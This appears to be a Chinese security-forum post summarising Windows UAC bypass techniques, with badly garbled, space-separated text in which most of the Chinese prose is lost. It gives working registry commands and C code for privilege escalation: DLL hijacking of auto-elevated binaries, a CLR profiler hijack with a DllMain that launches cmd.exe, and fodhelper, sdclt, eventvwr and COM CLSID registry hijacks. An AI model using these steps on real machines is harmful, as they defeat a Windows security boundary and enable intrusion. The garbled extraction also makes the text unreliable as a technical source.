[18408] 2021-08-13_干货BypassUAC技术总结

文档创建者:s7ckTeam
浏览次数:12
最后更新:2025-01-18
2021-08-13_干货BypassUAC技术总结 | B y p a s s   U A C   C o n s T 2 7   H A C K   2 0 2 1 - 0 8 - 1 3 .   U A C U s e r   A c c o u n t   C o n t r o l U A C ) [ W i n d o w s   V i s t a ] ( h t t p s : / / b a i k e . b a i d u . c o m / i t e m / W i n d o w s   V i s t a ) .   a u t o E l e v a t e r e q u e s t e d E x e c u t i o n L e v e l a u t o E l e v a t e E X E < a u t o E l e v a t e >   e x e d l l B y p a s s   U A C : s i g c h e c k C : W i n d o w s S y s W O W 6 4 S y s t e m P r o p e r t i e s A d v a n c e d . e x e  
西 r e q u e s t e d E x e c u t i o n L e v e l a s I n v o k e r   r e q u i r e A d m i n i s t r a t o r   h i g h e s t A v a i l a b l e   a s I n v o k e r r e q u i r e A d m i n i s t r a t o r h i g h e s t A v a i l a b l e U A C 便 .   a u t o e l e v a t e C L R .   B y p a s s   U A C 1 .   D L L r e f e r e n c e : h t t p s : / / w w w . a n q u a n k e . c o m / p o s t / i d / 2 0 9 0 3 3 h t t p s : / / w w w . c n b l o g s . c o m / 0 d a y b u g / p / 1 1 7 1 9 5 4 1 . h t m l e x e d l l d l l S Y S T E M 3 2
1 6 ( ) d l l K n o w   D L L s D L L D L L H K E Y _ L O C A L _ M A C H I N E S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l S e s s i o n   M a n a g e r K n o w n D L L S d l l k n o w d l l s d l l d l l d l l d l l d l l d l l 1   D L L D L L D L L 2   D L L D L L D L L D L L D L L D L L S Y S T E M W i n d o w s S e t C u r r e n t D i r e c c t o r y P A T H K n o w   D L L s
3   D L L D L L / D L L 4   D L L D L L % P A T H %   . e x e . m a n i f e s t / . e x e . l o c a l D L L 5   W i n S x S   D L L D L L W i n S x S D L L D L L D L L 6   D L L D L L 使 L O L b i n D L L 1 C : W i n d o w s S y s W O W 6 4 S y s t e m P r o p e r t i e s A d v a n c e d . e x e L i s t a r y L i s t a r y p r o c e s s m o n i t o r S y s t e m P r o p e r t i e s A d v a n c e d . e x e d l l L i s t a r y L i s t a r y H o o k . d l l d l l l i s t a r y d l l d l l m a i n c m d d l l S y s t e m P r o p e r t i e s A d v a n c e d . e x e c m d
b y p a s s u a c l i s t a r y 2 使 e v e n t v w r . m s c m m c . e x e m m c   e v e n t v w r . m s c , p r o c e s s   e x p l o e r m m c . e x e p r o c e s s   m o n i t o r
c m d   m m c   e v e n t v w r . m s c , d l l   - > S Y S T E M 3 2 - > S Y S T E M - > W I N D O W S - > S Y S T E M 3 2 m m c S y s t e m 3 2 - > P A T H e l s e x t . d l l d l l d l l d l l m a i n d l l m a i n w i n 7   s p 1 , 7 6 0 0 2 .   C L R D L L C L R . n e t j a v a c l r P r o f i l i n g 便 C L R d l l . N E T D L L d l l C L R c m d b y p a s s u a c d l l C L R C O R _ E N A B L E _ P R O F I L I N G   =   1 C O R _ P R O F I L E R = { C L S I D o r   P r o g I D } C L R C O R _ E N A B L E _ P R O F I L I N G 1 n e t 4 . 0 C O R _ P R O F I L E R d l l n e t 4 . 0 C O R _ P R O F I L E R _ P A T H d l l C O R _ P R O F I L E R d l l C O R _ E N A B L E _ P R O F I L I N G C O R _ P R O F I L E R w i n 1 0 C L S I D I n p r o c s e r v e r 3 2 d l l .   m m c g p e d i t . m s c d l l d l l s y s t e m ( c m d . e x e )   c m d
R E G   A D D   " H K C U S o f t w a r e C l a s s e s C L S I D { F F F F F F F F - F F F F - F F F F - F F F F - F F F F F F F F F F F F } I n p r o c S e r v e r 3 2 "   / v e   / t   R E G _ E X P A N D _ S Z   / d   " C : t e s t c a l c . d l l "   / f R E G   A D D   " H K C U E n v i r o n m e n t "   / v   " C O R _ P R O F I L E R "   / t   R E G _ S Z   / d   " { F F F F F F F F - F F F F - F F F F - F F F F - F F F F F F F F F F F F } "   / f R E G   A D D   " H K C U E n v i r o n m e n t "   / v   " C O R _ E N A B L E _ P R O F I L I N G "   / t   R E G _ S Z   / d   " 1 "   / f m m c   g p e d i t . m s c d l l / /   d l l m a i n . c p p   :     D L L   # i n c l u d e   " p c h . h " # i n c l u d e   < i o s t r e a m > # i n c l u d e   < W i n d o w s . h > B O O L   W I N A P I   D l l M a i n ( H I N S T A N C E   h i n s t D L L ,   D W O R D   f d w R e a s o n ,   L P V O I D   l p R e s e r v e d ) {         c h a r   c m d [ ]   =   " c m d . e x e " ;         s w i t c h   ( f d w R e a s o n )         {         c a s e   D L L _ P R O C E S S _ A T T A C H :                 W i n E x e c ( c m d ,   S W _ S H O W N O R M A L ) ;                 E x i t P r o c e s s ( 0 ) ;                 b r e a k ;         c a s e   D L L _ T H R E A D _ A T T A C H :                 b r e a k ;         c a s e   D L L _ T H R E A D _ D E T A C H :                 b r e a k ;         c a s e   D L L _ P R O C E S S _ D E T A C H :                 b r e a k ;         }         r e t u r n   T R U E ; }
C O R _ P R O F I L E R _ P A T H s e r v e r s h a r e t e s t . d l l s m b b y p a s s u a c 3 .   o d b c a d 3 2 . e x e C : W i n d o w s s y s t e m 3 2 o d b c a d 3 2 . e x e p o w e r s h e l l c m d b y p a s s
c m d - - p o w e r s h e l l - p o w e r s h e l l   4 .   F o d h e l p e r . e x e F o d h e l p e r . e x e   w i n 1 0 w i n 1 0 b y p a s s u a c a u t o e l e v a t e 使 p r o c e e m o n i t o r H K C U S o f t w a r e C l a s s e s m s - s e t t i n g s s h e l l o p e n c o m m a n d   H K C R m s - s e t t i n g s S h e l l O p e n , 便 C o m m a n d H K C U S o f t w a r e C l a s s e s m s - s e t t i n g s s h e l l o p e n c o m m a n d b y p a s s u a c r e g   a d d   H K E Y _ C U R R E N T _ U S E R S o f t w a r e C l a s s e s m s - s e t t i n g s s h e l l o p e n c o m m a n d   / d   C : W i n d o w s S y s t e m 3 2 c m d . e x e   / f   r e g   a d d   H K E Y _ C U R R E N T _ U S E R S o f t w a r e C l a s s e s m s - s e t t i n g s s h e l l o p e n c o m m a n d   / v   D e l e g a t e E x e c u t e   / t   R E G _ D W O R D   / d   0 0 0 0 0 0 0 0   / f F o d h e l p e r . e x e   c m d r e g   d e l e t e   " H K E Y _ C U R R E N T _ U S E R S o f t w a r e C l a s s e s m s - s e t t i n g s s h e l l o p e n c o m m a n d " s d c l t W i n 1 0
r e g   a d d   " H K C U S o f t w a r e C l a s s e s F o l d e r s h e l l o p e n c o m m a n d "   / d   C : W i n d o w s S y s t e m 3 2 c m d . e x e   / f   r e g   a d d   " H K C U S o f t w a r e C l a s s e s F o l d e r s h e l l o p e n c o m m a n d "   / v   " D e l e g a t e E x e c u t e "   / f e v e n t v m r r e g   a d d   " H K C U S o f t w a r e C l a s s e s m s c f i l e s h e l l o p e n c o m m a n d "   / d   C : W i n d o w s S y s t e m 3 2 c m d . e x e   / f w i n 1 0 w i n 7 , 5 .   C O M d l l C L S I D C O M H K C U S o f t w a r e C l a s s e s C L S I D H K C R C L S I D H K L M S O F T W A R E M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n S h e l l C o m p a t i b i l i t y O b j e c t s e v e n t v w r { 0 A 2 9 F F 9 E - 7 F 9 C - 4 4 3 7 - 8 B 1 1 - F 4 2 4 4 9 1 E 3 9 3 1 } I n P r o c S e r v e r 3 2 D L L D L L e v e n t v w r H K C R C L S I D
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则